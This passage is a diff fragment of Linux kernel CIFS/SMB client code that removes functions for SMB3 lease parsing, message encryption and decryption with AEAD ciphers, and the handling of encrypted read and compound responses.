+-static __u8
+-smb2_parse_lease_buf(void *buf, unsigned int *epoch, char *lease_key)
+-{
+-	struct create_lease *lc = (struct create_lease *)buf;
+-
+-	*epoch = 0; /* not used */
+-	if (lc->lcontext.LeaseFlags & SMB2_LEASE_FLAG_BREAK_IN_PROGRESS_LE)
+-		return SMB2_OPLOCK_LEVEL_NOCHANGE;
+-	return le32_to_cpu(lc->lcontext.LeaseState);
+-}
+-
+-static __u8
+-smb3_parse_lease_buf(void *buf, unsigned int *epoch, char *lease_key)
+-{
+-	struct create_lease_v2 *lc = (struct create_lease_v2 *)buf;
+-
+-	*epoch = le16_to_cpu(lc->lcontext.Epoch);
+-	if (lc->lcontext.LeaseFlags & SMB2_LEASE_FLAG_BREAK_IN_PROGRESS_LE)
+-		return SMB2_OPLOCK_LEVEL_NOCHANGE;
+-	if (lease_key)
+-		memcpy(lease_key, &lc->lcontext.LeaseKey, SMB2_LEASE_KEY_SIZE);
+-	return le32_to_cpu(lc->lcontext.LeaseState);
+-}
+-
+-static unsigned int
+-smb2_wp_retry_size(struct inode *inode)
+-{
+-	return min_t(unsigned int, CIFS_SB(inode->i_sb)->ctx->wsize,
+-		     SMB2_MAX_BUFFER_SIZE);
+-}
+-
+-static bool
+-smb2_dir_needs_close(struct cifsFileInfo *cfile)
+-{
+-	return !cfile->invalidHandle;
+-}
+-
+-static void
+-fill_transform_hdr(struct smb2_transform_hdr *tr_hdr, unsigned int orig_len,
+-		   struct smb_rqst *old_rq, __le16 cipher_type)
+-{
+-	struct smb2_hdr *shdr =
+-			(struct smb2_hdr *)old_rq->rq_iov[0].iov_base;
+-
+-	memset(tr_hdr, 0, sizeof(struct smb2_transform_hdr));
+-	tr_hdr->ProtocolId = SMB2_TRANSFORM_PROTO_NUM;
+-	tr_hdr->OriginalMessageSize = cpu_to_le32(orig_len);
+-	tr_hdr->Flags = cpu_to_le16(0x01);
+-	if ((cipher_type == SMB2_ENCRYPTION_AES128_GCM) ||
+-	    (cipher_type == SMB2_ENCRYPTION_AES256_GCM))
+-		get_random_bytes(&tr_hdr->Nonce, SMB3_AES_GCM_NONCE);
+-	else
+-		get_random_bytes(&tr_hdr->Nonce, SMB3_AES_CCM_NONCE);
+-	memcpy(&tr_hdr->SessionId, &shdr->SessionId, 8);
+-}
+-
+-static void *smb2_aead_req_alloc(struct crypto_aead *tfm, const struct smb_rqst *rqst,
+-				 int num_rqst, const u8 *sig, u8 **iv,
+-				 struct aead_request **req, struct scatterlist **sgl,
+-				 unsigned int *num_sgs)
+-{
+-	unsigned int req_size = sizeof(**req) + crypto_aead_reqsize(tfm);
+-	unsigned int iv_size = crypto_aead_ivsize(tfm);
+-	unsigned int len;
+-	u8 *p;
+-
+-	*num_sgs = cifs_get_num_sgs(rqst, num_rqst, sig);
+-
+-	len = iv_size;
+-	len += crypto_aead_alignmask(tfm) & ~(crypto_tfm_ctx_alignment() - 1);
+-	len = ALIGN(len, crypto_tfm_ctx_alignment());
+-	len += req_size;
+-	len = ALIGN(len, __alignof__(struct scatterlist));
+-	len += *num_sgs * sizeof(**sgl);
+-
+-	p = kmalloc(len, GFP_ATOMIC);
+-	if (!p)
+-		return NULL;
+-
+-	*iv = (u8 *)PTR_ALIGN(p, crypto_aead_alignmask(tfm) + 1);
+-	*req = (struct aead_request *)PTR_ALIGN(*iv + iv_size,
+-						crypto_tfm_ctx_alignment());
+-	*sgl = (struct scatterlist *)PTR_ALIGN((u8 *)*req + req_size,
+-					       __alignof__(struct scatterlist));
+-	return p;
+-}
+-
+-static void *smb2_get_aead_req(struct crypto_aead *tfm, const struct smb_rqst *rqst,
+-			       int num_rqst, const u8 *sig, u8 **iv,
+-			       struct aead_request **req, struct scatterlist **sgl)
+-{
+-	unsigned int off, len, skip;
+-	struct scatterlist *sg;
+-	unsigned int num_sgs;
+-	unsigned long addr;
+-	int i, j;
+-	void *p;
+-
+-	p = smb2_aead_req_alloc(tfm, rqst, num_rqst, sig, iv, req, sgl, &num_sgs);
+-	if (!p)
+-		return NULL;
+-
+-	sg_init_table(*sgl, num_sgs);
+-	sg = *sgl;
+-
+-	/* Assumes the first rqst has a transform header as the first iov.
+-	 * I.e.
+-	 * rqst[0].rq_iov[0]  is transform header
+-	 * rqst[0].rq_iov[1+] data to be encrypted/decrypted
+-	 * rqst[1+].rq_iov[0+] data to be encrypted/decrypted
+-	 */
+-	for (i = 0; i < num_rqst; i++) {
+-		/*
+-		 * The first rqst has a transform header where the
+-		 * first 20 bytes are not part of the encrypted blob.
+-		 */
+-		for (j = 0; j < rqst[i].rq_nvec; j++) {
+-			struct kvec *iov = &rqst[i].rq_iov[j];
+-
+-			skip = (i == 0) && (j == 0) ? 20 : 0;
+-			addr = (unsigned long)iov->iov_base + skip;
+-			len = iov->iov_len - skip;
+-			sg = cifs_sg_set_buf(sg, (void *)addr, len);
+-		}
+-		for (j = 0; j < rqst[i].rq_npages; j++) {
+-			rqst_page_get_length(&rqst[i], j, &len, &off);
+-			sg_set_page(sg++, rqst[i].rq_pages[j], len, off);
+-		}
+-	}
+-	cifs_sg_set_buf(sg, sig, SMB2_SIGNATURE_SIZE);
+-
+-	return p;
+-}
+-
+-static int
+-smb2_get_enc_key(struct TCP_Server_Info *server, __u64 ses_id, int enc, u8 *key)
+-{
+-	struct TCP_Server_Info *pserver;
+-	struct cifs_ses *ses;
+-	u8 *ses_enc_key;
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+-		if (ses->Suid == ses_id) {
+-			spin_lock(&ses->ses_lock);
+-			ses_enc_key = enc ? ses->smb3encryptionkey :
+-				ses->smb3decryptionkey;
+-			memcpy(key, ses_enc_key, SMB3_ENC_DEC_KEY_SIZE);
+-			spin_unlock(&ses->ses_lock);
+-			spin_unlock(&cifs_tcp_ses_lock);
+-			return 0;
+-		}
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	return -EAGAIN;
+-}
+-/*
+- * Encrypt or decrypt @rqst message. @rqst[0] has the following format:
+- * iov[0]   - transform header (associate data),
+- * iov[1-N] - SMB2 header and pages - data to encrypt.
+- * On success return encrypted data in iov[1-N] and pages, leave iov[0]
+- * untouched.
+- */
+-static int
+-crypt_message(struct TCP_Server_Info *server, int num_rqst,
+-	      struct smb_rqst *rqst, int enc)
+-{
+-	struct smb2_transform_hdr *tr_hdr =
+-		(struct smb2_transform_hdr *)rqst[0].rq_iov[0].iov_base;
+-	unsigned int assoc_data_len = sizeof(struct smb2_transform_hdr) - 20;
+-	int rc = 0;
+-	struct scatterlist *sg;
+-	u8 sign[SMB2_SIGNATURE_SIZE] = {};
+-	u8 key[SMB3_ENC_DEC_KEY_SIZE];
+-	struct aead_request *req;
+-	u8 *iv;
+-	DECLARE_CRYPTO_WAIT(wait);
+-	struct crypto_aead *tfm;
+-	unsigned int crypt_len = le32_to_cpu(tr_hdr->OriginalMessageSize);
+-	void *creq;
+-
+-	rc = smb2_get_enc_key(server, le64_to_cpu(tr_hdr->SessionId), enc, key);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Could not get %scryption key\n", __func__,
+-			 enc ? "en" : "de");
+-		return rc;
+-	}
+-
+-	rc = smb3_crypto_aead_allocate(server);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: crypto alloc failed\n", __func__);
+-		return rc;
+-	}
+-
+-	tfm = enc ? server->secmech.enc : server->secmech.dec;
+-
+-	if ((server->cipher_type == SMB2_ENCRYPTION_AES256_CCM) ||
+-		(server->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
+-		rc = crypto_aead_setkey(tfm, key, SMB3_GCM256_CRYPTKEY_SIZE);
+-	else
+-		rc = crypto_aead_setkey(tfm, key, SMB3_GCM128_CRYPTKEY_SIZE);
+-
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Failed to set aead key %d\n", __func__, rc);
+-		return rc;
+-	}
+-
+-	rc = crypto_aead_setauthsize(tfm, SMB2_SIGNATURE_SIZE);
+-	if (rc) {
+-		cifs_server_dbg(VFS, "%s: Failed to set authsize %d\n", __func__, rc);
+-		return rc;
+-	}
+-
+-	creq = smb2_get_aead_req(tfm, rqst, num_rqst, sign, &iv, &req, &sg);
+-	if (unlikely(!creq))
+-		return -ENOMEM;
+-
+-	if (!enc) {
+-		memcpy(sign, &tr_hdr->Signature, SMB2_SIGNATURE_SIZE);
+-		crypt_len += SMB2_SIGNATURE_SIZE;
+-	}
+-
+-	if ((server->cipher_type == SMB2_ENCRYPTION_AES128_GCM) ||
+-	    (server->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
+-		memcpy(iv, (char *)tr_hdr->Nonce, SMB3_AES_GCM_NONCE);
+-	else {
+-		iv[0] = 3;
+-		memcpy(iv + 1, (char *)tr_hdr->Nonce, SMB3_AES_CCM_NONCE);
+-	}
+-
+-	aead_request_set_tfm(req, tfm);
+-	aead_request_set_crypt(req, sg, sg, crypt_len, iv);
+-	aead_request_set_ad(req, assoc_data_len);
+-
+-	aead_request_set_callback(req, CRYPTO_TFM_REQ_MAY_BACKLOG,
+-				  crypto_req_done, &wait);
+-
+-	rc = crypto_wait_req(enc ? crypto_aead_encrypt(req)
+-				: crypto_aead_decrypt(req), &wait);
+-
+-	if (!rc && enc)
+-		memcpy(&tr_hdr->Signature, sign, SMB2_SIGNATURE_SIZE);
+-
+-	kfree_sensitive(creq);
+-	return rc;
+-}
+-
+-void
+-smb3_free_compound_rqst(int num_rqst, struct smb_rqst *rqst)
+-{
+-	int i, j;
+-
+-	for (i = 0; i < num_rqst; i++) {
+-		if (rqst[i].rq_pages) {
+-			for (j = rqst[i].rq_npages - 1; j >= 0; j--)
+-				put_page(rqst[i].rq_pages[j]);
+-			kfree(rqst[i].rq_pages);
+-		}
+-	}
+-}
+-
+-/*
+- * This function will initialize new_rq and encrypt the content.
+- * The first entry, new_rq[0], only contains a single iov which contains
+- * a smb2_transform_hdr and is pre-allocated by the caller.
+- * This function then populates new_rq[1+] with the content from olq_rq[0+].
+- *
+- * The end result is an array of smb_rqst structures where the first structure
+- * only contains a single iov for the transform header which we then can pass
+- * to crypt_message().
+- *
+- * new_rq[0].rq_iov[0] :  smb2_transform_hdr pre-allocated by the caller
+- * new_rq[1+].rq_iov[*] == old_rq[0+].rq_iov[*] : SMB2/3 requests
+- */
+-static int
+-smb3_init_transform_rq(struct TCP_Server_Info *server, int num_rqst,
+-		       struct smb_rqst *new_rq, struct smb_rqst *old_rq)
+-{
+-	struct page **pages;
+-	struct smb2_transform_hdr *tr_hdr = new_rq[0].rq_iov[0].iov_base;
+-	unsigned int npages;
+-	unsigned int orig_len = 0;
+-	int i, j;
+-	int rc = -ENOMEM;
+-
+-	for (i = 1; i < num_rqst; i++) {
+-		npages = old_rq[i - 1].rq_npages;
+-		pages = kmalloc_array(npages, sizeof(struct page *),
+-				      GFP_KERNEL);
+-		if (!pages)
+-			goto err_free;
+-
+-		new_rq[i].rq_pages = pages;
+-		new_rq[i].rq_npages = npages;
+-		new_rq[i].rq_offset = old_rq[i - 1].rq_offset;
+-		new_rq[i].rq_pagesz = old_rq[i - 1].rq_pagesz;
+-		new_rq[i].rq_tailsz = old_rq[i - 1].rq_tailsz;
+-		new_rq[i].rq_iov = old_rq[i - 1].rq_iov;
+-		new_rq[i].rq_nvec = old_rq[i - 1].rq_nvec;
+-
+-		orig_len += smb_rqst_len(server, &old_rq[i - 1]);
+-
+-		for (j = 0; j < npages; j++) {
+-			pages[j] = alloc_page(GFP_KERNEL|__GFP_HIGHMEM);
+-			if (!pages[j])
+-				goto err_free;
+-		}
+-
+-		/* copy pages form the old */
+-		for (j = 0; j < npages; j++) {
+-			char *dst, *src;
+-			unsigned int offset, len;
+-
+-			rqst_page_get_length(&new_rq[i], j, &len, &offset);
+-
+-			dst = (char *) kmap(new_rq[i].rq_pages[j]) + offset;
+-			src = (char *) kmap(old_rq[i - 1].rq_pages[j]) + offset;
+-
+-			memcpy(dst, src, len);
+-			kunmap(new_rq[i].rq_pages[j]);
+-			kunmap(old_rq[i - 1].rq_pages[j]);
+-		}
+-	}
+-
+-	/* fill the 1st iov with a transform header */
+-	fill_transform_hdr(tr_hdr, orig_len, old_rq, server->cipher_type);
+-
+-	rc = crypt_message(server, num_rqst, new_rq, 1);
+-	cifs_dbg(FYI, "Encrypt message returned %d\n", rc);
+-	if (rc)
+-		goto err_free;
+-
+-	return rc;
+-
+-err_free:
+-	smb3_free_compound_rqst(num_rqst - 1, &new_rq[1]);
+-	return rc;
+-}
+-
+-static int
+-smb3_is_transform_hdr(void *buf)
+-{
+-	struct smb2_transform_hdr *trhdr = buf;
+-
+-	return trhdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM;
+-}
+-
+-static int
+-decrypt_raw_data(struct TCP_Server_Info *server, char *buf,
+-		 unsigned int buf_data_size, struct page **pages,
+-		 unsigned int npages, unsigned int page_data_size,
+-		 bool is_offloaded)
+-{
+-	struct kvec iov[2];
+-	struct smb_rqst rqst = {NULL};
+-	int rc;
+-
+-	iov[0].iov_base = buf;
+-	iov[0].iov_len = sizeof(struct smb2_transform_hdr);
+-	iov[1].iov_base = buf + sizeof(struct smb2_transform_hdr);
+-	iov[1].iov_len = buf_data_size;
+-
+-	rqst.rq_iov = iov;
+-	rqst.rq_nvec = 2;
+-	rqst.rq_pages = pages;
+-	rqst.rq_npages = npages;
+-	rqst.rq_pagesz = PAGE_SIZE;
+-	rqst.rq_tailsz = (page_data_size % PAGE_SIZE) ? : PAGE_SIZE;
+-
+-	rc = crypt_message(server, 1, &rqst, 0);
+-	cifs_dbg(FYI, "Decrypt message returned %d\n", rc);
+-
+-	if (rc)
+-		return rc;
+-
+-	memmove(buf, iov[1].iov_base, buf_data_size);
+-
+-	if (!is_offloaded)
+-		server->total_read = buf_data_size + page_data_size;
+-
+-	return rc;
+-}
+-
+-static int
+-read_data_into_pages(struct TCP_Server_Info *server, struct page **pages,
+-		     unsigned int npages, unsigned int len)
+-{
+-	int i;
+-	int length;
+-
+-	for (i = 0; i < npages; i++) {
+-		struct page *page = pages[i];
+-		size_t n;
+-
+-		n = len;
+-		if (len >= PAGE_SIZE) {
+-			/* enough data to fill the page */
+-			n = PAGE_SIZE;
+-			len -= n;
+-		} else {
+-			zero_user(page, len, PAGE_SIZE - len);
+-			len = 0;
+-		}
+-		length = cifs_read_page_from_socket(server, page, 0, n);
+-		if (length < 0)
+-			return length;
+-		server->total_read += length;
+-	}
+-
+-	return 0;
+-}
+-
+-static int
+-init_read_bvec(struct page **pages, unsigned int npages, unsigned int data_size,
+-	       unsigned int cur_off, struct bio_vec **page_vec)
+-{
+-	struct bio_vec *bvec;
+-	int i;
+-
+-	bvec = kcalloc(npages, sizeof(struct bio_vec), GFP_KERNEL);
+-	if (!bvec)
+-		return -ENOMEM;
+-
+-	for (i = 0; i < npages; i++) {
+-		bvec[i].bv_page = pages[i];
+-		bvec[i].bv_offset = (i == 0) ? cur_off : 0;
+-		bvec[i].bv_len = min_t(unsigned int, PAGE_SIZE, data_size);
+-		data_size -= bvec[i].bv_len;
+-	}
+-
+-	if (data_size != 0) {
+-		cifs_dbg(VFS, "%s: something went wrong\n", __func__);
+-		kfree(bvec);
+-		return -EIO;
+-	}
+-
+-	*page_vec = bvec;
+-	return 0;
+-}
+-
+-static int
+-handle_read_data(struct TCP_Server_Info *server, struct mid_q_entry *mid,
+-		 char *buf, unsigned int buf_len, struct page **pages,
+-		 unsigned int npages, unsigned int page_data_size,
+-		 bool is_offloaded)
+-{
+-	unsigned int data_offset;
+-	unsigned int data_len;
+-	unsigned int cur_off;
+-	unsigned int cur_page_idx;
+-	unsigned int pad_len;
+-	struct cifs_readdata *rdata = mid->callback_data;
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
+-	struct bio_vec *bvec = NULL;
+-	struct iov_iter iter;
+-	struct kvec iov;
+-	int length;
+-	bool use_rdma_mr = false;
+-
+-	if (shdr->Command != SMB2_READ) {
+-		cifs_server_dbg(VFS, "only big read responses are supported\n");
+-		return -ENOTSUPP;
+-	}
+-
+-	if (server->ops->is_session_expired &&
+-	    server->ops->is_session_expired(buf)) {
+-		if (!is_offloaded)
+-			cifs_reconnect(server, true);
+-		return -1;
+-	}
+-
+-	if (server->ops->is_status_pending &&
+-			server->ops->is_status_pending(buf, server))
+-		return -1;
+-
+-	/* set up first two iov to get credits */
+-	rdata->iov[0].iov_base = buf;
+-	rdata->iov[0].iov_len = 0;
+-	rdata->iov[1].iov_base = buf;
+-	rdata->iov[1].iov_len =
+-		min_t(unsigned int, buf_len, server->vals->read_rsp_size);
+-	cifs_dbg(FYI, "0: iov_base=%p iov_len=%zu\n",
+-		 rdata->iov[0].iov_base, rdata->iov[0].iov_len);
+-	cifs_dbg(FYI, "1: iov_base=%p iov_len=%zu\n",
+-		 rdata->iov[1].iov_base, rdata->iov[1].iov_len);
+-
+-	rdata->result = server->ops->map_error(buf, true);
+-	if (rdata->result != 0) {
+-		cifs_dbg(FYI, "%s: server returned error %d\n",
+-			 __func__, rdata->result);
+-		/* normal error on read response */
+-		if (is_offloaded)
+-			mid->mid_state = MID_RESPONSE_RECEIVED;
+-		else
+-			dequeue_mid(mid, false);
+-		return 0;
+-	}
+-
+-	data_offset = server->ops->read_data_offset(buf);
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	use_rdma_mr = rdata->mr;
+-#endif
+-	data_len = server->ops->read_data_length(buf, use_rdma_mr);
+-
+-	if (data_offset < server->vals->read_rsp_size) {
+-		/*
+-		 * win2k8 sometimes sends an offset of 0 when the read
+-		 * is beyond the EOF. Treat it as if the data starts just after
+-		 * the header.
+-		 */
+-		cifs_dbg(FYI, "%s: data offset (%u) inside read response header\n",
+-			 __func__, data_offset);
+-		data_offset = server->vals->read_rsp_size;
+-	} else if (data_offset > MAX_CIFS_SMALL_BUFFER_SIZE) {
+-		/* data_offset is beyond the end of smallbuf */
+-		cifs_dbg(FYI, "%s: data offset (%u) beyond end of smallbuf\n",
+-			 __func__, data_offset);
+-		rdata->result = -EIO;
+-		if (is_offloaded)
+-			mid->mid_state = MID_RESPONSE_MALFORMED;
+-		else
+-			dequeue_mid(mid, rdata->result);
+-		return 0;
+-	}
+-
+-	pad_len = data_offset - server->vals->read_rsp_size;
+-
+-	if (buf_len <= data_offset) {
+-		/* read response payload is in pages */
+-		cur_page_idx = pad_len / PAGE_SIZE;
+-		cur_off = pad_len % PAGE_SIZE;
+-
+-		if (cur_page_idx != 0) {
+-			/* data offset is beyond the 1st page of response */
+-			cifs_dbg(FYI, "%s: data offset (%u) beyond 1st page of response\n",
+-				 __func__, data_offset);
+-			rdata->result = -EIO;
+-			if (is_offloaded)
+-				mid->mid_state = MID_RESPONSE_MALFORMED;
+-			else
+-				dequeue_mid(mid, rdata->result);
+-			return 0;
+-		}
+-
+-		if (data_len > page_data_size - pad_len) {
+-			/* data_len is corrupt -- discard frame */
+-			rdata->result = -EIO;
+-			if (is_offloaded)
+-				mid->mid_state = MID_RESPONSE_MALFORMED;
+-			else
+-				dequeue_mid(mid, rdata->result);
+-			return 0;
+-		}
+-
+-		rdata->result = init_read_bvec(pages, npages, page_data_size,
+-					       cur_off, &bvec);
+-		if (rdata->result != 0) {
+-			if (is_offloaded)
+-				mid->mid_state = MID_RESPONSE_MALFORMED;
+-			else
+-				dequeue_mid(mid, rdata->result);
+-			return 0;
+-		}
+-
+-		iov_iter_bvec(&iter, ITER_SOURCE, bvec, npages, data_len);
+-	} else if (buf_len >= data_offset + data_len) {
+-		/* read response payload is in buf */
+-		WARN_ONCE(npages > 0, "read data can be either in buf or in pages");
+-		iov.iov_base = buf + data_offset;
+-		iov.iov_len = data_len;
+-		iov_iter_kvec(&iter, ITER_SOURCE, &iov, 1, data_len);
+-	} else {
+-		/* read response payload cannot be in both buf and pages */
+-		WARN_ONCE(1, "buf can not contain only a part of read data");
+-		rdata->result = -EIO;
+-		if (is_offloaded)
+-			mid->mid_state = MID_RESPONSE_MALFORMED;
+-		else
+-			dequeue_mid(mid, rdata->result);
+-		return 0;
+-	}
+-
+-	length = rdata->copy_into_pages(server, rdata, &iter);
+-
+-	kfree(bvec);
+-
+-	if (length < 0)
+-		return length;
+-
+-	if (is_offloaded)
+-		mid->mid_state = MID_RESPONSE_RECEIVED;
+-	else
+-		dequeue_mid(mid, false);
+-	return length;
+-}
+-
+-struct smb2_decrypt_work {
+-	struct work_struct decrypt;
+-	struct TCP_Server_Info *server;
+-	struct page **ppages;
+-	char *buf;
+-	unsigned int npages;
+-	unsigned int len;
+-};
+-
+-
+-static void smb2_decrypt_offload(struct work_struct *work)
+-{
+-	struct smb2_decrypt_work *dw = container_of(work,
+-				struct smb2_decrypt_work, decrypt);
+-	int i, rc;
+-	struct mid_q_entry *mid;
+-
+-	rc = decrypt_raw_data(dw->server, dw->buf, dw->server->vals->read_rsp_size,
+-			      dw->ppages, dw->npages, dw->len, true);
+-	if (rc) {
+-		cifs_dbg(VFS, "error decrypting rc=%d\n", rc);
+-		goto free_pages;
+-	}
+-
+-	dw->server->lstrp = jiffies;
+-	mid = smb2_find_dequeue_mid(dw->server, dw->buf);
+-	if (mid == NULL)
+-		cifs_dbg(FYI, "mid not found\n");
+-	else {
+-		mid->decrypted = true;
+-		rc = handle_read_data(dw->server, mid, dw->buf,
+-				      dw->server->vals->read_rsp_size,
+-				      dw->ppages, dw->npages, dw->len,
+-				      true);
+-		if (rc >= 0) {
+-#ifdef CONFIG_CIFS_STATS2
+-			mid->when_received = jiffies;
+-#endif
+-			if (dw->server->ops->is_network_name_deleted)
+-				dw->server->ops->is_network_name_deleted(dw->buf,
+-									 dw->server);
+-
+-			mid->callback(mid);
+-		} else {
+-			spin_lock(&dw->server->srv_lock);
+-			if (dw->server->tcpStatus == CifsNeedReconnect) {
+-				spin_lock(&dw->server->mid_lock);
+-				mid->mid_state = MID_RETRY_NEEDED;
+-				spin_unlock(&dw->server->mid_lock);
+-				spin_unlock(&dw->server->srv_lock);
+-				mid->callback(mid);
+-			} else {
+-				spin_lock(&dw->server->mid_lock);
+-				mid->mid_state = MID_REQUEST_SUBMITTED;
+-				mid->mid_flags &= ~(MID_DELETED);
+-				list_add_tail(&mid->qhead,
+-					&dw->server->pending_mid_q);
+-				spin_unlock(&dw->server->mid_lock);
+-				spin_unlock(&dw->server->srv_lock);
+-			}
+-		}
+-		release_mid(mid);
+-	}
+-
+-free_pages:
+-	for (i = dw->npages-1; i >= 0; i--)
+-		put_page(dw->ppages[i]);
+-
+-	kfree(dw->ppages);
+-	cifs_small_buf_release(dw->buf);
+-	kfree(dw);
+-}
+-
+-
+-static int
+-receive_encrypted_read(struct TCP_Server_Info *server, struct mid_q_entry **mid,
+-		       int *num_mids)
+-{
+-	char *buf = server->smallbuf;
+-	struct smb2_transform_hdr *tr_hdr = (struct smb2_transform_hdr *)buf;
+-	unsigned int npages;
+-	struct page **pages;
+-	unsigned int len;
+-	unsigned int buflen = server->pdu_size;
+-	int rc;
+-	int i = 0;
+-	struct smb2_decrypt_work *dw;
+-
+-	*num_mids = 1;
+-	len = min_t(unsigned int, buflen, server->vals->read_rsp_size +
+-		sizeof(struct smb2_transform_hdr)) - HEADER_SIZE(server) + 1;
+-
+-	rc = cifs_read_from_socket(server, buf + HEADER_SIZE(server) - 1, len);
+-	if (rc < 0)
+-		return rc;
+-	server->total_read += rc;
+-
+-	len = le32_to_cpu(tr_hdr->OriginalMessageSize) -
+-		server->vals->read_rsp_size;
+-	npages = DIV_ROUND_UP(len, PAGE_SIZE);
+-
+-	pages = kmalloc_array(npages, sizeof(struct page *), GFP_KERNEL);
+-	if (!pages) {
+-		rc = -ENOMEM;
+-		goto discard_data;
+-	}
+-
+-	for (; i < npages; i++) {
+-		pages[i] = alloc_page(GFP_KERNEL|__GFP_HIGHMEM);
+-		if (!pages[i]) {
+-			rc = -ENOMEM;
+-			goto discard_data;
+-		}
+-	}
+-
+-	/* read read data into pages */
+-	rc = read_data_into_pages(server, pages, npages, len);
+-	if (rc)
+-		goto free_pages;
+-
+-	rc = cifs_discard_remaining_data(server);
+-	if (rc)
+-		goto free_pages;
+-
+-	/*
+-	 * For large reads, offload to different thread for better performance,
+-	 * use more cores decrypting which can be expensive
+-	 */
+-
+-	if ((server->min_offload) && (server->in_flight > 1) &&
+-	    (server->pdu_size >= server->min_offload)) {
+-		dw = kmalloc(sizeof(struct smb2_decrypt_work), GFP_KERNEL);
+-		if (dw == NULL)
+-			goto non_offloaded_decrypt;
+-
+-		dw->buf = server->smallbuf;
+-		server->smallbuf = (char *)cifs_small_buf_get();
+-
+-		INIT_WORK(&dw->decrypt, smb2_decrypt_offload);
+-
+-		dw->npages = npages;
+-		dw->server = server;
+-		dw->ppages = pages;
+-		dw->len = len;
+-		queue_work(decrypt_wq, &dw->decrypt);
+-		*num_mids = 0; /* worker thread takes care of finding mid */
+-		return -1;
+-	}
+-
+-non_offloaded_decrypt:
+-	rc = decrypt_raw_data(server, buf, server->vals->read_rsp_size,
+-			      pages, npages, len, false);
+-	if (rc)
+-		goto free_pages;
+-
+-	*mid = smb2_find_mid(server, buf);
+-	if (*mid == NULL)
+-		cifs_dbg(FYI, "mid not found\n");
+-	else {
+-		cifs_dbg(FYI, "mid found\n");
+-		(*mid)->decrypted = true;
+-		rc = handle_read_data(server, *mid, buf,
+-				      server->vals->read_rsp_size,
+-				      pages, npages, len, false);
+-		if (rc >= 0) {
+-			if (server->ops->is_network_name_deleted) {
+-				server->ops->is_network_name_deleted(buf,
+-								server);
+-			}
+-		}
+-	}
+-
+-free_pages:
+-	for (i = i - 1; i >= 0; i--)
+-		put_page(pages[i]);
+-	kfree(pages);
+-	return rc;
+-discard_data:
+-	cifs_discard_remaining_data(server);
+-	goto free_pages;
+-}
+-
+-static int
+-receive_encrypted_standard(struct TCP_Server_Info *server,
+-			   struct mid_q_entry **mids, char **bufs,
+-			   int *num_mids)
+-{
+-	int ret, length;
+-	char *buf = server->smallbuf;
+-	struct smb2_hdr *shdr;
+-	unsigned int pdu_length = server->pdu_size;
+-	unsigned int buf_size;
+-	struct mid_q_entry *mid_entry;
+-	int next_is_large;
+-	char *next_buffer = NULL;
+-
+-	*num_mids = 0;
+-
+-	/* switch to large buffer if too big for a small one */
+-	if (pdu_length > MAX_CIFS_SMALL_BUFFER_SIZE) {
+-		server->large_buf = true;
+-		memcpy(server->bigbuf, buf, server->total_read);
+-		buf = server->bigbuf;
+-	}
+-
+-	/* now read the rest */
+-	length = cifs_read_from_socket(server, buf + HEADER_SIZE(server) - 1,
+-				pdu_length - HEADER_SIZE(server) + 1);
+-	if (length < 0)
+-		return length;
+-	server->total_read += length;
+-
+-	buf_size = pdu_length - sizeof(struct smb2_transform_hdr);
+-	length = decrypt_raw_data(server, buf, buf_size, NULL, 0, 0, false);
+-	if (length)
+-		return length;
+-
+-	next_is_large = server->large_buf;
+-one_more:
+-	shdr = (struct smb2_hdr *)buf;
+-	if (shdr->NextCommand) {
+-		if (next_is_large)
+-			next_buffer = (char *)cifs_buf_get();
+-		else
+-			next_buffer = (char *)cifs_small_buf_get();
+-		memcpy(next_buffer,
+-		       buf + le32_to_cpu(shdr->NextCommand),
+-		       pdu_length - le32_to_cpu(shdr->NextCommand));
+-	}
+-
+-	mid_entry = smb2_find_mid(server, buf);
+-	if (mid_entry == NULL)
+-		cifs_dbg(FYI, "mid not found\n");
+-	else {
+-		cifs_dbg(FYI, "mid found\n");
+-		mid_entry->decrypted = true;
+-		mid_entry->resp_buf_size = server->pdu_size;
+-	}
+-
+-	if (*num_mids >= MAX_COMPOUND) {
+-		cifs_server_dbg(VFS, "too many PDUs in compound\n");
+-		return -1;
+-	}
+-	bufs[*num_mids] = buf;
+-	mids[(*num_mids)++] = mid_entry;
+-
+-	if (mid_entry && mid_entry->handle)
+-		ret = mid_entry->handle(server, mid_entry);
+-	else
+-		ret = cifs_handle_standard(server, mid_entry);
+-
+-	if (ret == 0 && shdr->NextCommand) {
+-		pdu_length -= le32_to_cpu(shdr->NextCommand);
+-		server->large_buf = next_is_large;
+-		if (next_is_large)
+-			server->bigbuf = buf = next_buffer;
+-		else
+-			server->smallbuf = buf = next_buffer;
+-		goto one_more;
+-	} else if (ret != 0) {
+-		/*
+-		 * ret != 0 here means that we didn't get to handle_mid() thus
+-		 * server->smallbuf and server->bigbuf are still valid. We need
+-		 * to free next_buffer because it is not going to be used
+-		 * anywhere.
+-		 */
+-		if (next_is_large)
+-			free_rsp_buf(CIFS_LARGE_BUFFER, next_buffer);
+-		else
+-			free_rsp_buf(CIFS_SMALL_BUFFER, next_buffer);
+-	}
+-
+-	return ret;
+-}
+-
+-static int
+-smb3_receive_transform(struct TCP_Server_Info *server,
+-		       struct mid_q_entry **mids, char **bufs, int *num_mids)
+-{
+-	char *buf = server->smallbuf;
+-	unsigned int pdu_length = server->pdu_size;
+-	struct smb2_transform_hdr *tr_hdr = (struct smb2_transform_hdr *)buf;
+-	unsigned int orig_len = le32_to_cpu(tr_hdr->OriginalMessageSize);
+-
+-	if (pdu_length < sizeof(struct smb2_transform_hdr) +
+-						sizeof(struct smb2_hdr)) {
+-		cifs_server_dbg(VFS, "Transform message is too small (%u)\n",
+-			 pdu_length);
+-		cifs_reconnect(server, true);
+-		return -ECONNABORTED;
+-	}
+-
+-	if (pdu_length < orig_len + sizeof(struct smb2_transform_hdr)) {
+-		cifs_server_dbg(VFS, "Transform message is broken\n");
+-		cifs_reconnect(server, true);
+-		return -ECONNABORTED;
+-	}
+-
